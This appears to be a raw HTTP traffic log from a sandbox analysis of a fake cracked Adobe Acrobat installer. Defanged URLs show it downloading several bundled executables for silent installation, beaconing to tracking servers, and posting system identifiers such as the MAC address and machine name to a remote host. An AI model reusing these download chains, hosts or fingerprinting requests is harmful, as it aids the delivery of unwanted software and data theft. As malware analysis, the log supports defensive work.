Last-Modified: Sun, 27 Nov 2016 04:06:13 GMT
Expires: Sun, 4 Dec 2016 04:06:13 GMT
Date: Sun, 27 Nov 2016 15:38:44 GMT
Connection: keep-alive
GET /launch_v5.php?p=sevenzip&pid=2735&tid=10958132&b_typ=pe&n=QWRvYmUgQWNyb2JhdCBYSSBQcm8gMTEuMC4xOCBN&reb=1&ic= HTTP/1.0
Host: get.enomenalco.club
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 871
Connection: close
Date: Sun, 27 Nov 2016 15:38:05 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 3df8c233328fbbb4fd91eb496d73f2d8.cloudfront.net (CloudFront)
X-Amz-Cf-Id: e8d2sKG-Rk6x8CGWhvDe4g0XzMRR9SWs9pQwMPHTkmgpIXg8EyIF4Q==
files=4
t1=dl
u1=hXXp://get.ynoptisticglob.bid/?affId=1006&appTitle=Adobe%20Acrobat%20XI%20Pro%2011.0.18%20M&s1=2735&s2=10958132&setupName=cpSetup&appVersion=2.92&instId=11&exe=1
n1=cpSetup.exe
b1=cp
c1=sevenzip-1
s1=0
m1=0
d1=0
t2=dl
u2=hXXp://wet.sodcattilyrem.bid/stub_maker_uk2.php?url=hXXp://gurusetman.info/taveara?q=Adobe Acrobat%20XI Pro 11.0.18 M
n2=sevensetup.exe
b2=rx
c2=sevenzip-1
s2=0
m2=0
d2=0
t3=dl
u3=hXXp://VVV.dosecuretrips.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
n3=Setup__2140_il2.exe
b3=am
c3=2140-sevenzip
s3=0
m3=0
d3=0
fn1=Components
fn2=File opener
fn3=File finder
fn4=SevenZip
ftitle=to run your file
itype=silent...
GET /taveara?q=Adobe Acrobat XI Pro 11.0.18 M HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
Host: gurusetman.info
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 301 Moved Permanently
Date: Sun, 27 Nov 2016 15:38:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=dcffe8a79a413e2d5aac5285621a4dd561480261106; expires=Mon, 27-Nov-17 15:38:26 GMT; path=/; domain=.gurusetman.info; HttpOnly
X-Powered-By: PHP/5.4.37
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Last-Modified: Sun, 27 Nov 2016 15:38:26 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: hXXp://tobacted.info?ad=2&ver=1&sid=8251&url=http://aclick.adhoc2.net/9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999&name=Adobe Acrobat XI Pro 11.0.18 M&type=setup&size=3145728&sub_id=346&sub_id2=ln86-ZoKmjAJkuOLcsi728C2NH7ENZEGrFMjOq6wQF_yVfdEDMrjilc_By0jfMGzhQlsgK0Jt-nbRI0I78ZQu2uSL5R0GVNFvaqOpbYhpyfY-kKwY3
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: *
Access-Control-Request-Headers: *
Server: cloudflare-nginx
CF-RAY: 3086aacc60c92950-OTP
GET /css/twin.css HTTP/1.1
Accept: text/css
Referer: hXXp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: tour.cinemaden.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/css
Date: Sun, 27 Nov 2016 15:38:42 GMT
ETag: W/"58372388-3b06f"
Last-Modified: Thu, 24 Nov 2016 17:29:44 GMT
Server: nginx
Strict-Transport-Security: max-age=31536000; includeSubDomains
transfer-encoding: chunked
Connection: keep-alive
GET /?ad=2&ver=1&sid=8251&url=http://aclick.adhoc2.net/9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999&name=Adobe Acrobat XI Pro 11.0.18 M&type=setup&size=3145728&sub_id=346&sub_id2=ln86-ZoKmjAJkuOLcsi728C2NH7ENZEGrFMjOq6wQF_yVfdEDMrjilc_By0jfMGzhQlsgK0Jt-nbRI0I78ZQu2uSL5R0GVNFvaqOpbYhpyfY-kKwY3 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
Host: tobacted.info
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Date: Sun, 27 Nov 2016 15:38:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d6eda53e888ba9059880b27824ddbd7461480261107; expires=Mon, 27-Nov-17 15:38:27 GMT; path=/; domain=.tobacted.info; HttpOnly
X-Powered-By: PHP/5.4.16
Location: hXXp://elja.linggyp.ru/9JyMZd3Sr1SWmlHcollYw9UchZnROZ1RwIVNMNVdyUXUahzNJBTSSJmbtQnSws0ZzxWUop3RNZmawknQfNGbppmcNRURkZmV59lRRdnNx9kaNZkcHVkWOV0NI5kMDhjM3k2cjx0T1tmSBpWbL9mWtYDOuxmI6IiMkl2XiV3ciwiI2QzMiojIkl2XiV3ciwiI4IzN1QTMzIiOiUmepNnIsICc1RXZzJiOiUGc5RnIsISTggTMuAjLxEDIvJHUgkEWgQXYi9mcjFEIlJ2bkFkI6ISZtFmbiwiI5kTO50zMyFmdm0jMyFmdm0TMyFmdmITP0R3PthnYD9FbwlWRQZHTFdjZnNVLWFXQ58CX0VmbuIzYvhGZh5yajlGbjF2Lc9CX6AHd0hmI6ICbyVnIsISM1IDOiojIkl2ciwiIxIiOiIXZ2Jye
Server: cloudflare-nginx
CF-RAY: 3086aad035062914-OTP
GET /launch_reb.php?p=sevenzip&tid=10958132&pid=2735&n=QWRvYmUgQWNyb2JhdCBYSSBQcm8gMTEuMC4xOCBNdWx0aWxpbmd1YWwgKyBDcmFjaw==&b_typ=pe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: get.ercationiv.club
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 165
Connection: keep-alive
Date: Sun, 27 Nov 2016 15:38:03 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 1d32f672764a20290d04a16248d04c57.cloudfront.net (CloudFront)
X-Amz-Cf-Id: pwOrHWNvHEzqRYu6kTcPvSZ6KfYulsUHBz183NeW7ON1TJMeH6lwVw==
s=first
u=hXXp://off.ncongruousric.bid/stub_maker.php?program=sevenzip&tid=10958132&pid=2735&b_typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.18 Multilingual + Crack
GET /9JyMZd3Sr1SWmlHcollYw9UchZnROZ1RwIVNMNVdyUXUahzNJBTSSJmbtQnSws0ZzxWUop3RNZmawknQfNGbppmcNRURkZmV59lRRdnNx9kaNZkcHVkWOV0NI5kMDhjM3k2cjx0T1tmSBpWbL9mWtYDOuxmI6IiMkl2XiV3ciwiI2QzMiojIkl2XiV3ciwiI4IzN1QTMzIiOiUmepNnIsICc1RXZzJiOiUGc5RnIsISTggTMuAjLxEDIvJHUgkEWgQXYi9mcjFEIlJ2bkFkI6ISZtFmbiwiI5kTO50zMyFmdm0jMyFmdm0TMyFmdmITP0R3PthnYD9FbwlWRQZHTFdjZnNVLWFXQ58CX0VmbuIzYvhGZh5yajlGbjF2Lc9CX6AHd0hmI6ICbyVnIsISM1IDOiojIkl2ciwiIxIiOiIXZ2Jye HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
Host: elja.linggyp.ru
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Sun, 27 Nov 2016 15:37:49 GMT
Content-Type: application/exe; charset=windows-1251
Content-Length: 3951944
Connection: keep-alive
X-Powered-By: PHP/5.4.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 27 Nov 2016 15:37:49 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Disposition: attachment; filename="Adobe Acrobat XI Pro 11.0.exe"
Content-Transfer-Encoding: binary
Pragma: public
GET /stub_maker_uk2.php?url=hXXp://gurusetman.info/taveara?q=Adobe Acrobat XI Pro 11.0.18 M HTTP/1.0
Host: wet.sodcattilyrem.bid
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: application/force-download
Content-Length: 60676
Connection: close
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.28
Content-Disposition: attachment; filename="583afdedde2bb_ua.exe"
X-Powered-By: ASP.NET
Date: Sun, 27 Nov 2016 15:38:21 GMT
X-Cache: Miss from cloudfront
Via: 1.1 1280e48937eca7de58e32cd35415f48a.cloudfront.net (CloudFront)
X-Amz-Cf-Id: oQ7y_HWecgaCXkCxikw8vq21OYN4z3k2ejmMGV3mJIa-ra6vjGhk6w==
POST /index.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: VVV.secularistsarakolet.site
Content-Length: 523
Connection: Keep-Alive
Cache-Control: no-cache
Net1.1=&Net2=3.5.30729.5420SP1&Net4=4.5.50709&OSversion=NT6.1SP1&Slv=&Sysid=541B298A93BFE2600111218F9ABFCC32&Sysid1=52D311BE788EE1E500992B8A6A042C2B&X64=N&admin=Y&browser=IE.HTTP&cavp=&chver=54.0.2840.59&cmdl=Setup__2140_il2.exe&dprod=D068E036AD104FFF0E13053E615F8D&dprod4=C275E3FEDEC17C9D31A2BE03568B64&exe=Setup__2140_il2&ffver=49.0.1.6109&lang_DfltUser=0409&mac=MDA1MDU2MzNCNTUxMDAwMAA=&machg=ODhkY2QzOTUtYjA2Mi00NWIzLWE2Y2QtNzlmMzdjMGViYTA4AA==&name=V0lOLVVLMEZGT084M0k2AA==&netfs=3&ts=1480261117&ver=1.1.5.26
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sun, 27 Nov 2016 15:38:39 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
transfer-encoding: chunked
Connection: keep-alive
4d9....<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.<html>. <head>. <meta http-equiv="content-type" content="text/html; charset=UTF-8" /> . <title>DownloadManagerModern</title>...<script type="text/javascript">... var g_notCompatibleWithUpdaterComps = ['LootFindKP'];... var g_postponedComps = ['updater', 'Paltalk', 'SHAREit', 'JinshanDuba', 'UCwebAccelerator', 'UltimateSecurityPackage' , 'TotalSecurity', 'TotalSecurityIN', 'TotalSecurityRU'];...</script> . <base href="hXXp://VVV.secularistsarakolet.site:80/index.php" />.<link rel="stylesheet" type="text/css" href="hXXp://cdn2.leadingdownload.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css" /> <script type="text/javascript" src="hXXp://cdn1.leadingdownload.com/V38/amipb.js"></script>. <script type="text/javascript">.var g_r_appimageurl="http:\/\/pe-sixi.com\/img\/icon_installer.png";..var g_r_appname="installer";..var g_r_cmdline="\/S";.. var g_amiobj = '', g_ami, g_updb = false, g_close = '1', g_additional_offer_list = '1';. var g_finish_install_button = '1';. var g_popup_install_all = '1';. var g_eula = 'VGhlIGRvd25sb2FkIGFuZCBpbnN0YWxsYXRpb24gcHJvY2VzcyBvZiB0aGlzIGZ..32e8..pbGUgaXMgcnVuIGJ5IEluc3RhbGxQYXRoIEluc3RhbGwgTWFuYWdlci4KQnkgY2xpY2tpbmcgdGhlICJBY2NlcHQiIG9yICJOZXh0IiBidXR0b25zIGJlbG93LCBvciBieSBjb250aW51aW5nIHRoaXMgSW5zdGFsbFBhdGggSW5zdGFsbCBNYW5hZ2VyIGluc3RhbGxhdGlvbiw
<<< skipped >>>
GET /crls/secureca.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Thu, 13 Oct 2016 09:30:22 GMT
If-None-Match: "b6a46da3cf1aa70c10b101b12c9733f4:1476351022"
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.geotrust.com
HTTP/1.1 200 OK
Server: Apache
ETag: "3db9af6d4daf4b2025d118aba973ba63:1480260638"
Last-Modified: Sun, 27 Nov 2016 15:30:38 GMT
Date: Sun, 27 Nov 2016 15:38:44 GMT
Content-Length: 325
Connection: keep-alive
Content-Type: application/pkix-crl
GET /download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png HTTP/1.0
Host: VVV.dosecuretrips.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: X-Target-FN
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Disposition: attachment; filename="Setup__2140_il2.exe"
Content-Type: application/x-msdownload
Date: Sun, 27 Nov 2016 15:38:33 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 27 Nov 2016 15:38:33 GMT
Pragma: no-cache
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
X-Target-FN: Setup__2140_il2.exe
Content-Length: 716288
Connection: Close
GET /ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCG8Char7jo+T HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: clients1.google.com
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Thu, 24 Nov 2016 19:25:21 GMT
Expires: Mon, 28 Nov 2016 19:25:21 GMT
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Age: 245603
Cache-Control: public, max-age=345600
GET /ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCHNzUKtRZktz HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: clients1.google.com
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Thu, 24 Nov 2016 19:31:39 GMT
Expires: Mon, 28 Nov 2016 19:31:39 GMT
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Age: 245227
Cache-Control: public, max-age=345600
GET /ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCHNzUKtRZktz HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: clients1.google.com
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Thu, 24 Nov 2016 20:12:58 GMT
Expires: Mon, 28 Nov 2016 20:12:58 GMT
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Age: 242749
Cache-Control: public, max-age=345600
GET /movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: tour.cinemaden.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html; charset=UTF-8
Date: Sun, 27 Nov 2016 15:38:41 GMT
Server: nginx
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Length: 36844
Connection: keep-alive
GET /js/main.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: hXXp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: tour.cinemaden.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/javascript
Date: Sun, 27 Nov 2016 15:38:45 GMT
ETag: W/"582622c6-368b"
Last-Modified: Fri, 11 Nov 2016 19:57:58 GMT
Server: nginx
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Length: 4244
Connection: keep-alive
GET /img/favicon/cinemaden.com/favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: tour.cinemaden.com
Connection: Keep-Alive
Cookie: _ga=GA1.2.1439064958.1480261126; _gat=1
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: image/x-icon
Date: Sun, 27 Nov 2016 15:38:47 GMT
ETag: "57325088-1536"
Last-Modified: Tue, 10 May 2016 21:20:08 GMT
Server: nginx
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Length: 5430
Connection: keep-alive
............ .h...&... .... .........(....... ..... .....@..................................................................................................................!...............................................................................q...............................#...[...........5...i...........9...............................5...%...........a.......................................%...A...m...o.......'...............}...........................!...o.......................................c...................................................................................G...........................................#.......................#...?.......S.......5...................!...................................e...............................................................q...................................................'.......#.......{.......................%...............................................{..........._...!...................................k...!...........1...)....................................................................................................................................................(... ...@..... ............................................................................................................................................#...................................................1.......................................................................................................................................................Q..........
<<< skipped >>>
GET /crls/secureca.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Thu, 13 Oct 2016 09:30:22 GMT
If-None-Match: "b6a46da3cf1aa70c10b101b12c9733f4:1476351022"
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.geotrust.com
HTTP/1.1 200 OK
Server: Apache
ETag: "3db9af6d4daf4b2025d118aba973ba63:1480260638"
Last-Modified: Sun, 27 Nov 2016 15:30:38 GMT
Date: Sun, 27 Nov 2016 15:38:44 GMT
Content-Length: 325
Connection: keep-alive
Content-Type: application/pkix-crl
0..A0..0...*.H........0N1.0...U....US1.0...U....Equifax1-0 ..U...$Equifax Secure Certificate Authority..161127152300Z..161207152300Z0,0....%...020514181157Z0.....3..020515130611Z0...*.H............44...... ..4-g..7"..q.J..0vPc..O..X..kD.3.Y.Rc.........:..p......i..u.]...!....:Q.......N.\..........\......cvl.........^3.~..!.HTTP/1.1 200 OK..Server: Apache..ETag: "3db9af6d4daf4b2025d118aba973ba63:1480260638"..Last-Modified: Sun, 27 Nov 2016 15:30:38 GMT..Date: Sun, 27 Nov 2016 15:38:44 GMT..Content-Length: 325..Connection: keep-alive..Content-Type: application/pkix-crl..0..A0..0...*.H........0N1.0...U....US1.0...U....Equifax1-0 ..U...$Equifax Secure Certificate Authority..161127152300Z..161207152300Z0,0....%...020514181157Z0.....3..020515130611Z0...*.H............44...... ..4-g..7"..q.J..0vPc..O..X..kD.3.Y.Rc.........:..p......i..u.]...!....:Q.......N.\..........\......cvl.........^3.~..!...
GET /stats.php?bu=cp&c=&step= HTTP/1.0
Host: get.gunnightmar.club
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Date: Sun, 27 Nov 2016 15:38:23 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 62fcc6919801a5602c53d055b177c4f9.cloudfront.net (CloudFront)
X-Amz-Cf-Id: v0nTILH8B7lO0atK9IGzAtS5FRJUiahDpMIx_3u_xZEqL90Dvtp00w==
GET /stats.php?bu=rx&c=&step=1 HTTP/1.0
Host: get.gunnightmar.club
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Date: Sun, 27 Nov 2016 15:38:32 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 d79148f01e44f5598c15bdd5ce1c1997.cloudfront.net (CloudFront)
X-Amz-Cf-Id: qKy6xKjkeNG7i9e4v7zZ6rDXDkkh0I6BRjbfGxCgBigmeRoNylQypw==
GET /MEQwQjBAMD4wPDAJBgUrDgMCGgUABBSxtDkXkBa3l3lQEfFgudSiPNvt7gQUAPkqw0GRtsnCuD5V8sCXEROgByACAwI6kg== HTTP/1.1
Cache-Control: max-age = 564348
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Wed, 12 Oct 2016 22:33:53 GMT
User-Agent: Microsoft-CryptoAPI/6.1
Host: g.symcd.com
HTTP/1.1 200 OK
Server: nginx/1.10.1
Content-Type: application/ocsp-response
Content-Length: 1362
content-transfer-encoding: binary
Cache-Control: max-age=563527, public, no-transform, must-revalidate
Last-Modified: Sun, 27 Nov 2016 04:06:13 GMT
Expires: Sun, 4 Dec 2016 04:06:13 GMT
Date: Sun, 27 Nov 2016 15:38:44 GMT
Connection: keep-alive
0..N......G0..C.. .....0.....40..00.......j.#.p.e$.\ps.*.. .j..20161127040613Z0f0d0<0... ..........9.....yP..`...<.......*.A.....>U....... ...:.....20161127040613Z....20161204040613Z0...*.H.............n%... l8.(,.Q`.j...:..6.xSGt*.....[.....(.S.V....gS.7.....R..}.Sl....{..._..m.@..^.).>.....(..../.ze.F.f:..m.<@...Z.A.H.....&1Z .'......~.X..:.[:/...n..SO I.8M.#w.0.D..$P.....,.......G[....~q..C.....Kp.~.`SQ.N....`.~&.sP.D.........9..t...:5...'....u.l.........0...0..|0..d........:.0...*.H........0B1.0...U....US1.0...U....GeoTrust Inc.1.0...U....GeoTrust Global CA0...151203170230Z..161214170230Z02100...U...'GeoTrust Global CA TGV OCSP Responder 40.."0...*.H.............0.........[.c.#zj......RME.....,......(..U......!-.l..R..E.~..%."./8mv..D...*...Rx........mw.~2..Q5T\.H...Wk*..a.z.$._..T......;T.S.r(._*.G....^.P.!.3..t.......s......P....C._.g.b.oK...EV..>...>.|.o.~quo.............v4..Tt....Q.]A.Y......... w.E..=.%.n7.......{" *C........0..0...U.#..0....z.h.....d..}.}e...N0... .....0......0...U.%..0... .......0...U...........0...U.......0.0 ..U....0...0.1.0...U....TGV-C-670...*.H...............aEc<..'R......]C.ri.Zm.....|..B.$..76..h....l...Xbxua...C.X.S....~K..A..._.T@$.....9(.... ......\.*.....5.b.x...[QM.._9P.=..l...gf..L.?..3 ......Z....._...20R;...x.......C..0....l.G.A..5TS>d.U......w.(\....v..9.z7.....J..;..'...u.Y...BB.@.2u.e..eW..J.U....
<<< skipped >>>
GET /report.php?typ=conversion&transId=139867460&affId=1006&instId=11&ho_transId=1024c893cfbfff9cc18408df1cefd7&s1=2735&s2=10958132&s3=&s4=&s5=1352224761&cid=5c12d1104cca24294ae7d8d45ce8d028&uac=true&randid=0.45457626983710575 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: InstallCapital
Host: ee.wintervenepest.bid
HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sun, 27 Nov 2016 15:37:30 GMT
Content-Length: 0
HTTP/1.1 200 OK..Content-Type: text/html..Server: Microsoft-IIS/8.5..X-Powered-By: PHP/5.3.28..Date: Sun, 27 Nov 2016 15:37:30 GMT..Content-Length: 0..
GET hXXp://will.ymuscaesnortin.bid/offer.php?affId=1006&trackingId=139867460&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1
Host: will.ymuscaesnortin.bid
Connection: close
Accept: */*
User-Agent: InstallCapital
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 5248
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sun, 27 Nov 2016 15:37:22 GMT
X-Cache: Miss from cloudfront
Via: 1.1 0176a7920fd558900dd5f893f79acb9e.cloudfront.net (CloudFront)
X-Amz-Cf-Id: l1my4O3razMEiR5YydeNmDYHWI5pPOfTnr-Yh5bIzfchTkSNUDbItg==
h.......z*Z..-..p.`...i...tg...N....D.@.D^.}D.c..;Y..k.......(...i........o...A....,B.>..........ocZ..........2O.......K..Re.....4.y....\!....4....h...f.^...2.........Uj....-*;Zr.L.$K..A.3.B.e....\>./......."H'..p.>A>..>....(...-/.7X...h.90.OO..1....@.^#}....).z....~I.z4.7p.9.'...1..p..lb..cT.AX9aN..L........g.."q0oU(...c....Y|...n.......x......$q.=.9.,..|.k^OF~....i.0....gnV......$n.i.I>*.#......B<k..k,i.R..,.....:......OA.zE6*Q.1.`.F.T.v......A..I....G.....x..7kH.. .Z....f`.jb.y}".........e.mUd...,."...&...=g.....ia..3. ,....."uDT...!..`..U;u3&...\1#..m..~d..1.....D;.n0...$....)L..C[..F.........ezn].`.w.R... ..U.......@MSmF..v"|...]..w.v.YjZ...1|pD.q........@....>......U3...4l..>P.-..........J....."..a.....@0..-.`..G...TB..Bb..%pC.5d..`.I.<.r\....V.W....G......p...v%!...@#..2... T....F.X...g.....:/.2XDQa..rmA..........#....].Yv..d].......R..|...............W{..>..JA..n.[1..o".C.K....f./$X-..A.."ui.b....@..#:OzhS...Gd..u.rJl1d.h .)d.........%8 ...}.O.K<.........S.......Vf...il.F.h..(...6Z..."J1.T.E.'A.gVm*...&.1E....$...sf.g...._.N..f"....y7.H..V.......Q.s.=.....B.d31%.=....0.Y..0.....t...g.c..B.../Q..$..h&=..BLB.........l..@..ffc1..B.6.....)...g0.__.....?....u....9.^..*....,..........*U...n...!.q.......&.h>.-u.I..pn..$fA.|....Wf.n.8.._...a/K&.(...^.8.$......5.'@K_.MB>....O...t......%$.sM5d7..._.;.{...T)}...c.......Z.~.W.......V...c.~.~y-..K0 ......&..d..{u...d.nwn..2.....#!.f5..(..$8.C...}....S...B.P.F]{UyU9.4.......0v.w.[do..@...^....p1..l^3&[......*.[.jj.b.$...5..{.
<<< skipped >>>
GET /?affId=1006&appTitle=Adobe%20Acrobat%20XI%20Pro%2011.0.18%20M&s1=2735&s2=10958132&setupName=cpSetup&appVersion=2.92&instId=11&exe=1 HTTP/1.0
Host: get.ynoptisticglob.bid
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Connection: close
Server: nginx/1.10.1
Date: Sun, 27 Nov 2016 15:38:10 GMT
X-Powered-By: PHP/5.4.16
Location: hXXp://away.yosauruslega.bid/get.php?ses=482796663418412224
X-Cache: Miss from cloudfront
Via: 1.1 3ef066dcf359ad5dbc339df978147194.cloudfront.net (CloudFront)
X-Amz-Cf-Id: RMWwWYPKPbgGnBwxbKPHR9ahWyMUS2Lgqtmka11YcIwRIWnNjdqqJQ==
GET /redirect?ad_unit=64&aid=A3097212614-1055013556-759180181&ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&var3=9999 HTTP/1.1
Accept: text/html, application/xhtml xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ads.affbuzzads.com
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Sun, 27 Nov 2016 15:38:42 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: hXXp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0
